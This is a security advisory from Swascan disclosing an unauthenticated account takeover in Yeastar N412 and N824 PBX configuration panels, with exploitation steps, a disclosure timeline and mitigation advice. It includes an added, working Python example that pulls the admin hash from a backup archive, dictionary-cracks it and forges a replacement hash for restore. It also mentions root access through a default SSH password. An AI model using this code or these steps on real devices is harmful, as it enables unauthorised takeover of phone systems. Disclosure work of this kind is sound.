Swascan Offensive Security Team identified several vulnerabilities during a penetration test of the Yeastar PBX Configuration Panel, N series.
After contacting the vendor on multiple occasions, no official reply had been issued as of 19/10/2022. Swascan is publishing this responsible vulnerability disclosure well after the 90-day grace period recommended for this activity.
Yeastar is a Chinese vendor with solid technical expertise in PBX systems and VoIP solutions.
Yeastar develops and manufactures products and solutions for remote collaboration.
Swascan Offensive Security Team found a critical vulnerability in the Yeastar N412 and N824 Configuration Panel.
| Vulnerability | CVSS v3 score | Vector |
|---|---|---|
| Account Takeover via restoring altered backup file | 9.8 Critical | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
The following section gives the technical details of this vulnerability, including evidence and a proof of concept. The vulnerability can affect hundreds of Internet-exposed devices.
In the Yeastar N412 and N824 Configuration Panel, an unauthenticated attacker can create a configuration backup and download it. The archive contains the admin password hash: if the hash can be cracked, the attacker logs into the Configuration Panel with the recovered password; otherwise the attacker replaces the hash inside the archive with one of their own choosing and restores the altered backup on the device.
The attack is launched remotely and requires no form of authentication.
Proof of Concept
To achieve the account takeover, the following steps are performed:
- Unauthenticated backup file creation
- Download of the .tar file just created
- Crack the admin hash found inside the archive and log into the device, or modify the .tar archive by replacing the admin hash
- If the hash could not be cracked, upload the altered backup file
- Restore the uploaded backup file
- Reboot the device if needed
Details of the exploitation steps:
1. Request the creation of a backup file with a given name.
2. Download the backup file just created.
3. The downloaded archive contains the admin hash. Once obtained, the hash can be cracked; otherwise, the archive is modified and uploaded back to the device.
4. Restore the uploaded configuration backup file.
5. If needed, trigger a reboot to reload the configuration with the new password.
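The offline part of the procedure above (steps 3 and 4: pull the admin hash out of the downloaded .tar, try to crack it, and if that fails rewrite the hash and repack the archive for upload) as an added example. This is not Swascan's proof-of-concept code and it does not issue the HTTP requests, because the advisory does not show the panel's endpoints. The file name inside the backup, the shadow-style `admin:<hash>` line layout and the unsalted MD5/SHA digest format are all assumptions made for the demonstration; the sample archive is constructed in memory.

```python
import hashlib
import io
import re
import tarfile
from typing import Iterable, Optional

# Assumed path of the credential file inside the backup (hypothetical).
CONFIG_NAME = "etc/users.conf"
# Assumed line layout: "admin:<hex digest>[:extra fields]".
ADMIN_LINE = re.compile(r"^(admin:)([0-9a-fA-F]+)(.*)$", re.MULTILINE)
# Unsalted algorithms guessed from digest length (assumption for the demo).
HASHERS = {32: hashlib.md5, 40: hashlib.sha1, 64: hashlib.sha256}


def build_sample_backup(password: str = "password") -> bytes:
    """Constructed test fixture: a minimal backup .tar, not a real device dump."""
    digest = hashlib.md5(password.encode()).hexdigest()
    body = f"user:guest:x\nadmin:{digest}:ssh=off\n".encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(CONFIG_NAME)
        info.size = len(body)
        tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()


def extract_admin_hash(backup: bytes) -> Optional[str]:
    """Step 3: scan every regular file in the archive for the admin line."""
    with tarfile.open(fileobj=io.BytesIO(backup), mode="r") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            text = tar.extractfile(member).read().decode(errors="replace")
            match = ADMIN_LINE.search(text)
            if match:
                return match.group(2).lower()
    return None


def crack_hash(digest: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack; returns the password if a candidate matches."""
    hasher = HASHERS.get(len(digest))
    if hasher is None:          # salted or unknown format: give up, forge instead
        return None
    digest = digest.lower()
    for candidate in wordlist:
        if hasher(candidate.encode()).hexdigest() == digest:
            return candidate
    return None


def forge_backup(backup: bytes, new_password: str) -> bytes:
    """Step 4 fallback: swap the admin hash for one we control and repack.

    Every other entry is copied byte-for-byte so the restore still succeeds.
    """
    new_digest = hashlib.md5(new_password.encode()).hexdigest()
    out = io.BytesIO()
    with tarfile.open(fileobj=io.BytesIO(backup), mode="r") as src, \
            tarfile.open(fileobj=out, mode="w") as dst:
        for member in src.getmembers():
            if not member.isfile():
                dst.addfile(member)
                continue
            data = src.extractfile(member).read()
            text = data.decode(errors="replace")
            if ADMIN_LINE.search(text):
                text = ADMIN_LINE.sub(
                    lambda m: m.group(1) + new_digest + m.group(3), text)
                data = text.encode()
                member.size = len(data)   # header size must match new payload
            dst.addfile(member, io.BytesIO(data))
    return out.getvalue()


if __name__ == "__main__":
    sample = build_sample_backup("password")
    found = extract_admin_hash(sample)
    recovered = crack_hash(found, ["admin", "123456", "password"])
    print("admin hash:", found, "-> cracked:", recovered)
    forged = forge_backup(sample, "NewPass!")
    print("forged admin hash:", extract_admin_hash(forged))
```

`forge_backup` only rewrites the one file that matches the admin pattern and leaves the rest of the archive untouched, which is what you want when the device validates the restored configuration as a whole; if the real backup is compressed or signed, that check has to be dealt with before this step applies.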
With administrative access, an attacker could also enable the SSH console, which uses a default root password when activated, and execute arbitrary commands as root on the Linux-based system.
The Swascan Offensive Security Team recommends not exposing the device directly to the Internet; instead, place it behind a VPN connection.
- 04-03-2022: Vulnerabilities discovered
- 08-03-2022: Vendor contacted by email (1st time, no reply)
- 14-03-2022: Vendor contacted by email (2nd time, no reply)
- 23-03-2022: Swascan reported the issue to CERT/CC
- 28-06-2022: CERT/CC received no response from the vendor
- 07-07-2022: Vendor contacted by email
- 17-10-2022: Swascan disclosed the vulnerability
- 20-01-2023: CVE issued: CVE-2022-47732